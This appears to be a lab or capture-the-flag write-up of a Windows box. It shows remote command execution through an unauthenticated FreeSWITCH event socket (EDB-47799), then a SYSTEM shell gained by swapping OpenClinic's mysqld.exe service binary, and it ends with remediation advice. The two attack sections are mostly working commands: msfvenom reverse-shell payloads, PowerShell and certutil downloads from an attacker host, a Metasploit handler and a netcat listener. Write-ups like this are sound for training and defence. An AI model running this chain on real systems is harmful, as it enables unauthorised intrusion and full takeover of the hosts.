Case file

FreeSWITCH event-socket RCE and OpenClinic service binary hijack

Foundations Windows engagement: unauthenticated FreeSWITCH mod_event_socket on 8021 (EDB-47799) executed commands as Nekrotic; OpenClinic GA LPE (EDB-50448) replaced mysqld.exe for a SYSTEM shell after reboot.

Foundations28 minWindows · VoIP · FreeSWITCH · Privilege Escalation
  • Port 8021 accepted FreeSWITCH event-socket commands without auth. A Meterpreter foothold as Nekrotic swapped OpenClinic’s mysqld.exe; reboot returned SYSTEM.

  • EDB-47799 against 8021 returned whoami as Nekrotic and staged a Meterpreter exe.

  • Replaced mariadb\bin\mysqld.exe with a reverse shell; reboot started SYSTEM.

01

Engagement summary

Port 8021 accepted FreeSWITCH event-socket commands without auth. A Meterpreter foothold as Nekrotic swapped OpenClinic’s mysqld.exe; reboot returned SYSTEM.

FLATLINE exposed RDP on 3389 and FreeSWITCH mod_event_socket on 8021. Exploit-DB 47799 sent unauthenticated commands as WIN-EOM4PK0578N\Nekrotic, enough to read the user artifact and stage a Meterpreter payload. Under C:\projects\openclinic\mariadb\bin, OpenClinic GA (EDB-50448) ran mysqld.exe as a privileged service. We backed up the real binary, dropped an msfvenom reverse shell named mysqld.exe, and Restart-Computer — the service start gave a SYSTEM shell and the root artifact.

Business impact

Unauthenticated FreeSWITCH event sockets are remote command execution on VoIP hosts. Writable service binaries under application trees are SYSTEM after the next restart. Bind 8021 to localhost with a strong password, patch FreeSWITCH, and protect service binary paths with ACLs that deny user write.

02

FreeSWITCH event-socket RCE

EDB-47799 against 8021 returned whoami as Nekrotic and staged a Meterpreter exe.

OPERATOR · NMAP

savvy@lab:~$ nmap -sV -sC -Pn 10.201.101.104

3389/tcp open ms-wbt-server

8021/tcp open freeswitch-event FreeSWITCH mod_event_socket

OPERATOR · EDB-47799

savvy@lab:~$ python3 47799.txt 10.201.101.104 whoami

win-eom4pk0578n\nekrotic

savvy@lab:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=OPERATOR_IP LPORT=4444 -f exe > payload.exe

savvy@lab:~$ python3 47799.txt 10.201.101.104 "powershell Invoke-WebRequest -URI http://OPERATOR_IP:8000/payload.exe -o C:\\Users\\Nekrotic\\Desktop\\payload.exe"

savvy@lab:~$ msfconsole -q

msf6 > use multi/handler

msf6 > set payload windows/x64/meterpreter/reverse_tcp

msf6 > run

savvy@lab:~$ python3 47799.txt 10.201.101.104 "C:\\Users\\Nekrotic\\Desktop\\payload.exe"

Meterpreter session opened

03

OpenClinic mysqld.exe hijack

Replaced mariadb\bin\mysqld.exe with a reverse shell; reboot started SYSTEM.

OPERATOR · SERVICE HIJACK

savvy@lab:~$ msfvenom -p windows/shell_reverse_tcp LHOST=OPERATOR_IP LPORT=8900 -f exe > mysql.exe

savvy@lab:~$ nc -lnvp 8900

# meterpreter: cd C:\projects\openclinic\mariadb\bin

meterpreter > shell

C:\...> Move-Item mysqld.exe mysqld.bak

C:\...> certutil.exe -urlcache -split -f http://OPERATOR_IP:8000/mysql.exe mysqld.exe

C:\...> Restart-Computer

C:\Windows\system32>

C:\Windows\system32> whoami

nt authority\system

Remediation

Require event-socket auth and firewall 8021. Upgrade FreeSWITCH. Lock OpenClinic/MariaDB binary directories to Administrators-only write; monitor service binary hash changes.